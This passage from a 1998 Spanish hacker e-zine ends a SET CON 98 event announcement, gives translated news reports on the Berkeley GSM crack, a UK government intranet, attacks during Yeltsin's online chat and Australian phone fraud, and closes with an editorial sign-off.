  2567.   que tu ordenador mantenga un servidor HTTP (puerto 80), servidor 
  2568.   de correo y servidor de FTP. Pero eso no es todo. A cada participante 
  2569.   se le suministrara un archivo, que tendra el mismo nombre para 
  2570.   todo el mundo y debera estar en el mismo directorio, aunque el 
  2571.   contenido no sera el mismo. No ganara el que mas tiempo este 
  2572.   operativo. Tampoco sera el que obtenga mas archivos ajenos. Sera 
  2573.   el que consiga ambas cosas a la vez. 
  2574.  
  2575.   { Gymkana } 
  2576.  
  2577.   El ultimo dia se realizara una gymkana en los alrededores del local 
  2578.   de las Jornadas. Se trata de demostrar que tambien tenemos algo de 
  2579.   fisico ;) 
  2580.  
  2581.   Habra pruebas tradicionales como el lanzamiento de discos duros 
  2582.   (si alguien los presta), o el de diskettes, hasta pruebas nuevas 
  2583.   como determinar la informacion de una tarjeta perforada... por 
  2584.   el tacto 
  2585.  
  2586.  
  2587.   -[ PREMIOS ]- 
  2588.  
  2589.   Parte de los premios pueden salir de donaciones. Asi que esperamos 
  2590.   vuestro apoyo en este aspecto. Personalmente considero como un gran 
  2591.   premio la obtencion de un speccy original ;) 
  2592.  
  2593.  
  2594.   -[ PROYECCIONES ]- 
  2595.  
  2596.   Durante las jornadas se proyectaran peliculas que hayan tenido o tengan 
  2597.   algo de importancia dentro del mundo de la seguridad informatica. Seran 
  2598.   peliculas como "Juegos de Guerra", "Fisgones" y hasta incluso "Hackers" 
  2599.   (Alguna habra que criticar, no? ;) ) 
  2600.  
  2601.  
  2602.   -[ MISC ]- 
  2603.  
  2604.   Quedan por resolver temas de alojamiento, transporte, horarios. Permaneced 
  2605.   atentos a la pagina de SET (http://www.geocities.com/SiliconValley/8726), 
  2606.   sonde apareceran los proximos anuncios y el enlace a la pagina de la 
  2607.   SET CON 98. 
  2608.  
  2609.   Para cualquier tipo de duda o colaboracion, escribid a 
  2610.   <setcon@bigfoot.com> 
  2611.  
  2612.   Have P/Hun 
  2613.   Falken 
  2614.  
  2615. <────────────────────────────────────────────────────────────────────────────>
  2616.  
  2617.   CRACKEADO EL ALGORITMO DE LOS TELEFONOS DIGITALES (GSM).
  2618.  
  2619.   Investigadores crackean el codigo de los Telefonos Celulares
  2620.   por John Markoff
  2621.  
  2622.         San Francisco - En un logrado intento de crack un conocido metodo de
  2623.   encriptacion para prevenir la clonazion de los telefonos digitales moviles,
  2624.   un grupo de investigadores informaticos de la Universidad de California
  2625.   creen que tiene importantes evidencias que el sistema empleado por los
  2626.   telefonos es deliberadamente debil para permetir la vigilancia del gobierno.
  2627.  
  2628.         El metodo crackeado es conocido como GSM (Groupe Speciale Mobile). El
  2629.   sistema de encriptacion mas usado en el mundo para los telefonos celulares,
  2630.   el GSM es usado en unos 80 millones de aparatos alrededor del mundo y al
  2631.   menos unos 2 millones de telefonos en los Estados Unidos.
  2632.                                                                     
  2633.         Mas de los 58 millones de telefonos analogicos y digitales americanos
  2634.   estan basados en una variedad de otros metodos, pero 20 compañias americanas
  2635.   dedicacas a telefonia digital celular incluidas Pacific Bell, una division
  2636.   de SBC Communications, y Omnipoint corp. utilizan el estandar GSM.
  2637.  
  2638.         Dos investigadores de la Universidad Californiana Berkeley anunciaron
  2639.   el pasado Lunes que ellos havian logrado romper el metodo GSM usando un
  2640.   ordenador para determinar el numero secreto guardado en el Subscriber
  2641.   Identify Module (SIM), una especie de tarjeta de credito dentro del
  2642.   telefono.
  2643.  
  2644.         Si los criminales pudiesen crackear el metodo, ellos podrian clonar
  2645.   los telefonos protegidos mediante encriptacion GSM, para ello, tendrian que
  2646.   detectar un numero de un telefono y usarlo en otro telefono para fradulentar
  2647.   las llamadas. Por otro lado, los investigadores y los representantes de las
  2648.   compañias telefonicas celulares dijeron el Lunes que el uso de la clonacion 
  2649.   era remota en comparacion con la vulneravilidad de los telefonos analogicos
  2650.   celulares. Por una cosa en concreto, ya que dijeron, que para crackear el
  2651.   GSM se requiere al menos unas 10 horas de pruebas electronicas y la
  2652.   utilizacion de maquinas muy potentes.
  2653.  
  2654.         Lo que era mas intrigante todavia que el hecho de la seguridad, era
  2655.   que crackeando el codigo se descubrio que el llave digital usada en los GSM
  2656.   posiblemente fue manipulada durante el proceso de diseño para permitir a
  2657.   las agencias gubernamentales espiar las conversaciones celulares.
  2658.  
  2659.         Aunque la llave. conocida como A5, es un sistema de encriptacion de
  2660.   64 bit, generalmente un codigo dificil de crackear, los investigadores han
  2661.   determinado que los ultimos 10 digitos eran actualmente ceros. Esto
  2662.   significa que con potentes ordenadores, sistemas utilizados por las
  2663.   agencias de inteligencia gubernamentales, puede ser posible decodificar una
  2664.   conversacion telefonica rapidamente, explica Marc Briceno, director de la
  2665.   Smartcard Developers Association, una pequeña organizacion de programadores.
  2666.   "Aparemente la llave se debilito intencionadamente", dice. "Y no puedo
  2667.   pensar en ninguna razon para hacer esto intencionadamente".
  2668.               
  2669.         Durante los ultimos años, la industria informatica esta plagada de
  2670.   rumores sobre que las agencias gubernamentales han forzado o persuadido a
  2671.   los desarrolladores de cripto sistemas a implementar debilidades matematicas
  2672.   en los sistemas de seguridad o incluso puertas traseras. Algunos de estos
  2673.   rumores hablan sobre la N
  2674. 1005
  2675. SA (National Security Agency) o la CIA (Central
  2676.   Intelligence Agency) que teniendo ellos mismos criptografos, diseñando
  2677.   programas criptograficos para ellos mismos y despues lo liberan, para
  2678.   asegurarse que ellos pueden decodificar datos informaticos o conversaciones
  2679.   telefonicas.
  2680.                                             
  2681.         Algunos rumores han cogido importancia, en parte, sobre el autentico
  2682.   origen del sistema GSM. Expertos criptografos dicen que las primeras
  2683.   formulas matematicas, o los algoritmos, en el sistema criptografico GSM
  2684.   proviene originalmente de Alemania o Francia como parte de una creacion
  2685.   sobre un estandar en los años 1986 y 1987.
  2686.  
  2687.         "Es imposible esto hacer esto, por lo que debe haber otras razones",
  2688.   alega Stewart Baker, un abogado de Washington que fue antiguamente abogado
  2689.   de la NSA. La NSA es una de las agencias mas acusadas de sospecha debido
  2690.   en mayor parte ya que su mision es interceptar llamanadas telefonicas.
  2691.   "La especulacion es facil, y nunca muere", dice.
  2692.                                                                 
  2693.         Aunque, muchos expertos de la industria no pueden pensar en una buena
  2694.   razon de porque un algoritmo encriptador debe ser debilitado
  2695.   intencionadamente, otra razon que para permitir la vigilancia.
  2696.  
  2697.         "Esto a sido debilitado intencionadamente", dice Phil Karn, un
  2698.   ingeniero de la Qualcomm Inc., una compañia de telefonia celular que ha
  2699.   desarrollado un estandar alternativo al GSM. "Quien crees que esta
  2700.   interesado en hacer una cosa como esa?".
  2701.                                                                 
  2702.         La debi llave fue descubierta por dos investigadores. Ian Goldberg y
  2703.   David Wagner, ambos miembros de la universidad de California en el grupo de
  2704.   Aplicaciones de Seguridad en Internet, Autentificacion y Criptografia en
  2705.   Berkeley. Ellos hicieron hincapie en que habian detectado facilmente el
  2706.   fallo de seguridad que permite clonar los telefonos celulares.
  2707.                              
  2708.         La industria de la telefonia celular es consciente del fallo en los
  2709.   GSM pero dice que realmente a reforzado su justificacion en la seguridad
  2710.   de los telefonos digitales.
  2711.  
  2712.         "Me quito el sombrero antes estos muchachos, han hecho un magnifico
  2713.   trabajo," dice George Schimtt, presidente de la Omnipoint. "Yo les daria
  2714.   credito, pero no estamos en peligro de fraude."
  2715.  
  2716.         Los investigadores y la Smartcard Developers Association dicen que el
  2717.   exito del ataque se debe a las nuevas evidencias de las practicas de la
  2718.   industria a esconder las tecnicas de seguridad del publico. La autentica
  2719.   seguridad, ellos alegan, requiere la publicacion de los algoritmos para
  2720.   que expertos independientes puedan verificar la fuerza del sistema.
  2721.                                                       
  2722.         "Esto demuestra otra vez un fallo en un proceso de diseño cerrado."
  2723.   dice Briceno. "Estas compañias se privan ellos mismoa de la seguridad, pero
  2724.   ahora las gallinas han llegado a casa para freirse".
  2725.     
  2726.   Link's Relacionados:
  2727.  
  2728.   Another GSM crack info page at
  2729.   http://www.isaac.cs.berkeley.edu/isaac/gsm-faq.html
  2730.  
  2731.   The GSM algorithm, COMP128 can be seen in a C program source code at the
  2732.   SmartCard Developers Association Web site at
  2733.   http://www.scard.org/gsm/a3a8.txt
  2734.  
  2735.   European Telecommunications Standard Institute main page at
  2736.   http://www.etsi.fr/
  2737.  
  2738.   Info about SIM at
  2739.   http://www.etsi.fr/brochures/stateart/vedder.htm
  2740.  
  2741. <────────────────────────────────────────────────────────────────────────────>
  2742.   HACKERS DEL SERVICIO SECRETO INCAPACES DE CRACKEAR UNA INTRANET.
  2743.  
  2744.   PA 4/21/98 11:06 AM 
  2745.  
  2746.   By Giles Turnbull, PA News
  2747.  
  2748.         Hackers profesionales del servicio secreto fueron pillados en un
  2749.   intento de hackear el sistema de comunicaciones interno de seguridad del
  2750.   Gobierno, que fue puesto en marcha hoy mismo.
  2751.  
  2752.         Durante el desarrollo y planificacion de la Intranet, gente del GCHQ
  2753.   y otros organismos de seguridad similares tambien fueron pillados en un
  2754.   intento de hackear el sistema
  2755.  
  2756.         Pero ellos fallaron.
  2757.  
  2758.         Por otro lado, el ministro encargado del projecto admitio hoy que
  2759.   mirando los hackeos en los sistemas del Pentagono y de la Nasa en los
  2760.   EE.UU., el no puede decir que la nueva Intranet sea imposible de crackear.
  2761.  
  2762.         La Intranet Segura del Gobierno, The Goverment Secure Intranet (GIS),
  2763.   permitira a los ministros y gente del gobierno a comunicarse mediante
  2764.   e-mail y usar la herramienta cotidiana del Gobierno, conocida como Agenda.
  2765.  
  2766.         Una Intranet es un sistema de Internet cerrado que solo puede ser
  2767.   accedido por ciertas personas. Es un metodo muy popular en grandes compañias
  2768.   y organizaciones para sus comunicaciones internas.
  2769.  
  2770.         La primera fase del GIS, lanzada hoy, estara disponible para unas
  2771.   400 personas que tiene permiso para ver documentos clasificados.
  2772.                                                     
  2773.         La segunda fase, dentro de algunos meses, sera vista por unas 400,000
  2774.   personas y se incluiran documentos confidenciales.
  2775.                                            
  2776.         Nada clasificado como secreto sera puesto en la Intranet, dice el
  2777.   ministro en el cargo David Clark, Canciller del Ducado de Lancaster.
  2778.                                     
  2779.         Dr Clark dice que el comienzo del sistema a sido crucial para el
  2780.   futuro de un gobierno electronico.
  2781.                    
  2782.         "Esto a sido el comienzo del futuro sistema de funcionamiento del
  2783.   gobierno", alega.
  2784.  
  2785.         "Es una revolucion en el modo de hacer gobierno. Cuando llege al
  2786.   cargo hace un año yo estaba sorprendido de que no havia nada sobre
  2787.   seguridad electronica en las comunicaciones de los diferentes
  2788.   departamentos.
  2789.              
  2790.         "Muy pronto en el desarrollo del sistema invitamos a dos grupos de
  2791.   Hackers del gobierno y les ofrecimos el reto de hackear el sistema. Incluso
  2792.   les contamos como funcionaba pero aun asi no consiguieron romper la
  2793.   seguridad".
  2794.                                                  
  2795.         "Estoy muy seguro de que sera muy, muy dificil tal vez, pero no
  2796.   imposible, romper la seguridad" añade Dr Clark.
  2797.                                               
  2798.         El GIS fue inagurada hoy en 6 departamentos del Gobierno, y la
  2799.   segunda fase empezara dentro de 6 semanas. Otros departamentos estan
  2800.   esperando para unirse en los proximos meses.
  2801.  
  2802. <────────────────────────────────────────────────────────────────────────────>
  2803.   ATAQUE HACKER DURANTE EL CHAT DE YELTSIN.
  2804.  
  2805.   MOSCOW, May 13
  2806.  
  2807.         Los rusos dicen que han detenido 20 intentos de dejar desconectados
  2808.   los servidores de Moscu. 
  2809.                                                             
  2810.         Las autorirades rusas dicen de haber detenido unos 20 intentos por
  2811.   Hackers de desconectar el ordenador en el cual el presidente Boris Yeltsin
  2812.   estaba usando para su primera charla en Internet en MSNBC.
  2813.                                                                  
  2814.         La agencia de noticias entrevisto a un official de la Agencia Federal
  2815.   para las Comunicaciones e Informacion Gubermental, Federal Agency for
  2816.   Goverment Communication and Information (FAPSI) diciendo que los Hackers
  2817.   intentaron desconectar el servidor, refiriendose a la red gubernamental
  2818.   que provee el intercambio de mensajes entre Yeltsin e Internet.
  2819.  
  2820.         Chris Donohue, quien estuvo media hora en la sesion de chat en MSNBC,
  2821.   dijo que no a havido aparentemente ningun asalto en los servidores de la
  2822.   compañia, los cuales usan ingles para responder y preguntar. "Nuestro
  2823.   servidor funciono perfectamente, y ningun ataque fue notificado por nuestro
  2824.   equipo", dice.
  2825.                                 
  2826.         Donohue dice que alrededor de unas 4000 personas se unieron al chat.
  2827.   Los representantes del FAPSI alegan que unos 22,000 usuarios de Internet
  2828.   visitaron el servidor de chat.
  2829.            
  2830.         La charla se fue desplazando hacia las nuevas leyes en las politicas
  2831.   de Moscu.                      
  2832.  
  2833.         Pero algunos navegantes del web aprendieron sobre las preguntaron
  2834.   qye le hacian a Yeltsin que su estado de salud es bueno en estos momentos,
  2835.   que nunca ha fumado un cigarro, y que su estilo de pelo se debe a la
  2836.   mujer de su vida y no por un pasado Irlandes y ademas dijo que no creia que
  2837.   Rusia este preparada para una mujer presidente.
  2838.                                                                              
  2839.         El FAPSI dijo que antiguamente sus lineas eran faciles de hackear
  2840.   mediante aparatos electronicos de alta tecnologia y sistema criptograficos.
  2841.                                                                       
  2842.         Varios Hackers adolescentes de diferentes paises, incluidos Rusia,
  2843.   han sido acusados de recientes asaltos a los sistemas informaticos del
  2844.   Pentagono en los EE.UU. y otras redes militares alrededor del globo.
  2845.  
  2846. <────────────────────────────────────────────────────────────────────────────>
  2847.   AUSTRALIA: MILLONES EN PERDIDAS POR CULPA DE LOS PHREAKERS.
  2848.  
  2849.   14 May 98 By ANDREW PROBYN.
  2850.                                           
  2851.         Millones de dolares estan siendo robados de los usuarios de telefonos
  2852.   en Australia debido a phreakers que utilizan elaborados scaners telefonicos.
  2853.                            
  2854.         Viviendas, empresas y usuarios de telefonos mobiles estan siendo
  2855.    victimas de un gran y sistematico fraude telefonico. Las empresas Telstra
  2856.    y Optus han hecho avances en proteger sus redes de telecomunicaciones,
  2857.    pero los Hackers han incrementado sus entradas en la red para robar los
  2858.    codigos de los usuarios.
  2859.  
  2860.         El Herald Sun ha descubierto muchos casos en los cuales los Hackers
  2861.   eran acusados de estos actos, incluidos una vivienda que tiene una factura
  2862.   en llamadas por $10,000 que el niega haber hecho.
  2863.                                                                       
  2864.         Una investigacion del Herald Sun revela que: Llamadas eroticas en
  2865.   los Estados Unidos, la Guyana, la Republica Dominicana, Rusia y Chile son
  2866.   generalmente mamipuladas para aparecer en otras cuentas telefonicas.
  2867.                                               
  2868.         Los Hackers pueden manipular sus llamadas en Internet, locales e
  2869.   internacionales para que no sean detectadas.
  2870.  
  2871.         Las empresas con centralitas internas, PABX, son particularmente
  2872.   vulnerables y son frecuentementes usadas por los Hackers.
  2873.                                                                      
  2874.         Los telefonos mobiles aunque sus mecanismo de seguridad pueden ser
  2875.   clonados usando su tarjeta SIM, el chip ID que controla la factura.
  2876.                                                                             
  2877.         Wally Rothwell, representante de la industria de las
  2878.   telecomunicaciones, dice que el hacking se ha vuelto una costosa realidad.
  2879.            
  2880.         "El hacking le puede costar a los cosumidores unos millones de
  2881.   dolares," dice. "Algunas de estas llamadas son muy caras - llamadas
  2882.   eroticas, por ejemplo, puede costar solo $30 el ya conectar." Durante Enero
  2883.   y marzo de este año, viviendas y pequeñas empresas niegan haber hecho esas
  2884.   llamadas.
  2885.  
  2886.         Mr Rothwell dice que esto es "phreaking" - un faude en el cual el
  2887.   coste de las llamadas son dirigidas hacia otro usuario - y ha sido probado 
  2888.   en las centralitas. "Por otro lado, tenemos que comprobar si el hacking se
  2889.   puede hacer remotamente o desde fuera de la centralita de telefonos."
  2890.                                      
  2891.         Pero un experto phreaker conto al Herald Sun que los Hackers
  2892.    establecieron hace algunos años ya como realizar llamadas ilegales en las
  2893.    centralitas desde lineas externas.
  2894.  
  2895.         "Cuando yo hacia esto usaba mi ordenador para programar la centralita
  2896.   para hacer lo que yo quisiera que hiciese," dice Mr Dedio.
  2897.                                                                          
  2898.         "Los phreakers expertos suelen usar lineas normales y ordenadores de
  2899.   sobremesa para generar ciertos sonidos para abrir la centralita" dice.
  2900.                                                       
  2901.         El dice que los Hackers tambien acceden a las lineas privadas
  2902.   manipulando los pitidos de las centralitas en las calles. Ellos pueden
  2903.   facilmente dirigir llamadas hacia los vecinos, dice, pero esto peligroso.
  2904.                                
  2905.         "Si puedes meterte en una centralita no hace falta que robes la linea
  2906.   telefonica de alquien," dice.
  2907.                                    
  2908.         La figura principal del Queensland University of Technology's school
  2909.   of data comunications, el profesor Bill Caelli, dice que ni siquiera las
  2910.   sofisticadas redes estan a salvo.
  2911.                                             
  2912.         Muchas compañias con sistemas PABX han sucumbido por los miles de
  2913.   millones en fraude telefonico en el Reino Unido, los Estados Unidos y
  2914.   Canada. Investigadores de la Universidad de Berkeley, California, el mes
  2915.   pasado probaron que los telefonos digitales ya no era seguros, clonando
  2916.   el chip SIM que controla la factura, dice.
  2917.                                                                          
  2918.         La Autoridad Australiana en la Comunicaciones dice que las grandes
  2919.   compañias tiene que tener extremo cuidado. "Cuanto mas grande es la
  2920.   compañia, mas grande es la factura y mas facil es para el Hackers
  2921.   esconderse," dice el representante Frank Nowlan. La pena maxima por
  2922.   phreaking es de cinco años en prision bajo el Acta Federal de Crimenes.
  2923.                      
  2924.         El relaciones de Telstra Stephen Nason dice que Telstra cree que su
  2925.   red de seguridad es la mas segura del mundo contra los Hackers. "Como
  2926.   ninguna red es 100% segura, nosotros creemos que la red de Telstra es
  2927.   muy segura," dice.
  2928.                                                                
  2929.         El hacking no se esta expandiendo, dice, con probablemente unos 50
  2930.   casos por año en Australia. El relaciones de Optus Kristin Meagher dice
  2931.   que Optus no tiene evidencia alguna de hacking en sus redes.
  2932.  
  2933.   (C) 1998 Herald and Weekly Times Limited.
  2934.   HERALD SUN 14/05/98 P7 
  2935.  
  2936. <────────────────────────────────────────────────────────────────────────────>
  2937. ██████████████████████████████████████████████████████████████████████████████
  2938. <────────────────────────────────────────────────────────────────────────────>
  2939.  
  2940.         Bueno, pues aqui acaba el numero cinco y ademas tambien nuestro
  2941.   primer volumen, que visto los mail's recibios y haciendo balances de los
  2942.   articulos aportados por los lectores, pues ha gustado mucho. Por supuesto
  2943.   esto es solo el principio, pero esto no se podra conseguir ni no nos
  2944.   ayudais aportando articulos, okis?
  2945.  
  2946.         Pues esto acaba por hoy y esperamos oir de vostros, vuestras
  2947.   felicitaciones, quejas, criticas, articulos o actos de hack, pues escribe a
  2948.   nuestro buzon y si tiene miedo pues ya sabes usa nuestra llave publica PGP.
  2949.   Escribe!!!!!!!
  2950.  
  2951.   jjf_team@usa.net
  2952.  
  2953.  
  2954.                          ADIOS Y HASTA EL SIGUIENTE NUMERO!!!
  2955.                                - J.J.F. / HACKERS TEAM -
  2956.  
  2957. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2958.  
  2959.  
  2960.  
  2961.